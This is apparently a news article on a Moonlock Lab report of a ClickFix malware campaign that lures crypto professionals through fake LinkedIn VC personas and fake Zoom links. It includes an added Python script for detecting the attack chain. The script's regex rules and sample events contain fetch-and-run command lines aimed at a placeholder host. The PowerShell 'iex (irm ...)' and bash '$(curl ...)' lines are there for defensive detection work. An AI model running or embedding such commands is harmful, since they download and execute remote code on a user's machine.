Image: Moonlock Lab
Cybersecurity researchers at Moonlock Lab have unmasked a coordinated malware operation targeting cryptocurrency and Web3 professionals. The campaign, which shares striking tactical overlaps with the North Korean-aligned threat group UNC1069, uses fabricated venture capital identities and fraudulent video conferencing links to deliver cross-platform payloads.
The attack begins on LinkedIn, where operators use polished personas like “Mykhailo Hureiev,” a supposed Co-Founder at the fictitious SolidBit Capital. The approach is highly personalized, often beginning with flattery regarding a target’s visibility in the crypto community.
Once a rapport is established, the operator pushes for a meeting via a Calendly link. However, this link is a trap: it is “configured to redirect the victim to a fake Zoom meeting link” that serves as the gateway for the infection.
What makes this campaign particularly dangerous is its use of the ClickFix technique. Unlike traditional downloads that might be flagged by antivirus software, ClickFix “weaponizes user trust by disguising malicious command execution as a routine browser verification step”.
- Fake CAPTCHA: Victims are presented with a familiar-looking “I’m not a robot” checkbox with Cloudflare branding.
- Clipboard Poisoning: Clicking the box silently “writes a malicious command to the user’s clipboard” using JavaScript.
- Guided Execution: The page then displays a modal that “instructs the user to open their terminal and paste the clipboard contents”.
The Moonlock report emphasizes the psychological trickery involved, noting that the attackers use “animated step-by-step cursor demonstrations” and “a countdown timer to create artificial urgency”.
The campaign is “cross-platform by design,” detecting the victim’s operating system to serve the appropriate malicious script:
- Windows: The clipboard receives a PowerShell command that initiates a “classic fileless malware loader,” executing a remote script directly in memory to avoid leaving artifacts on the disk.
- macOS: The payload is more elaborate: a “bash one-liner” that can install Homebrew to facilitate the download of the final Python-based malware.
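The two OS-specific chains above lend themselves to detection on process-creation telemetry rather than on the lure page itself, since the command is typed by the victim into a terminal. Below is an added example (not code from the Moonlock Lab report or from the campaign) of a small Python triage script that scores command lines for ClickFix-style patterns: a PowerShell in-memory download cradle with hidden window and policy bypass on Windows, and curl-to-shell, Homebrew bootstrap and interpreter-from-temp steps on macOS. The event format, host names, the `example.invalid` URLs, the sample events and the rule weights are all constructed for illustration; the per-host roll-up exists because the macOS chain is made of individually weak steps that only look bad together.

```python
"""Heuristic triage of process-creation events for ClickFix-style
"paste this into your terminal" chains. Added example: the event shape,
sample data, URLs and weights are constructed, not taken from any report."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    weight: int  # 1 = contextual hint, 2 = strong indicator on its own


# Patterns match on the command line only, so the same rules apply to
# Sysmon event 1, EDR process telemetry, or macOS Endpoint Security events.
RULES = (
    Rule("ps_hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 1),
    Rule("ps_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 1),
    # fetch primitive and Invoke-Expression in the same command line: fileless loader
    Rule("ps_in_memory_cradle",
         re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)"
                    r"(?=.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b)",
                    re.I), 2),
    # curl/wget output piped straight into a shell
    Rule("curl_pipe_shell",
         re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I), 2),
    # bash -c "$(curl ...)" inline fetch-and-run (also how a Homebrew bootstrap looks)
    Rule("inline_remote_bash", re.compile(r"\bbash\s+-c\s+\S*\$\((?:curl|wget)\b", re.I), 2),
    Rule("homebrew_install", re.compile(r"\bbrew\s+install\b", re.I), 1),
    # interpreter launched on a script in a temp or user-writable location
    Rule("python_from_tmp",
         re.compile(r"\bpython3?\s+(?:/tmp|/private/tmp|/var/folders|~)/\S+", re.I), 1),
)

ALERT_THRESHOLD = 2  # one strong indicator, or two contextual hints


def score_cmdline(cmdline: str):
    """Return (score, matched rule names) for a single command line."""
    hits = [r.name for r in RULES if r.pattern.search(cmdline)]
    score = sum(r.weight for r in RULES if r.name in hits)
    return score, hits


def triage(events):
    """Per-event alerts: events whose own score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_cmdline(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "score": score,
                           "rules": hits, "cmdline": ev["cmdline"]})
    return alerts


def host_rollup(events):
    """Per-host accumulated score, so a chain of weak steps on one
    machine (brew install, then python from /tmp) still surfaces."""
    totals = defaultdict(int)
    for ev in events:
        score, _ = score_cmdline(ev["cmdline"])
        totals[ev["host"]] += score
    return dict(totals)


# Constructed sample telemetry (hypothetical hosts and an invalid domain).
SAMPLE_EVENTS = [
    # Windows: loader pasted into a terminal after the fake CAPTCHA step
    {"host": "win-01", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/x)"'},
    # Windows: benign scripted build
    {"host": "win-02", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\build.ps1"},
    # macOS: bootstrap Homebrew, install Python, run a staged script
    {"host": "mac-01", "image": "bash",
     "cmdline": '/bin/bash -c "$(curl -fsSL http://example.invalid/install.sh)"'},
    {"host": "mac-01", "image": "brew", "cmdline": "brew install python"},
    {"host": "mac-01", "image": "python3", "cmdline": "python3 /tmp/.update/main.py"},
    # macOS: benign developer activity
    {"host": "mac-02", "image": "bash", "cmdline": 'bash -c "ls -la ~/Projects"'},
]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['host']}] score={alert['score']} rules={alert['rules']}")
    print("per-host totals:", host_rollup(SAMPLE_EVENTS))
```

On the sample data the Windows loader trips three rules at once, while the macOS chain produces one strong hit (the inline fetch-and-run) followed by two weak ones that only matter because the roll-up ties them to the same host; tune the threshold and weights against your own baseline, since `brew install` alone is routine on developer machines.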
The threat actors are highly organized, building out “fully built-out corporate facades designed to stand up to the scrutiny of a victim’s due diligence check”. Moonlock Lab found that while SolidBit Capital is their current front, they are already preparing Lumax Capital as their next iteration, complete with AI-generated headshots of “team members” with fabricated Stanford credentials.
Researchers warn that “behavioral and operational indicators are consistent with tactics previously attributed to DPRK-aligned threat actors,” though definitive attribution remains open.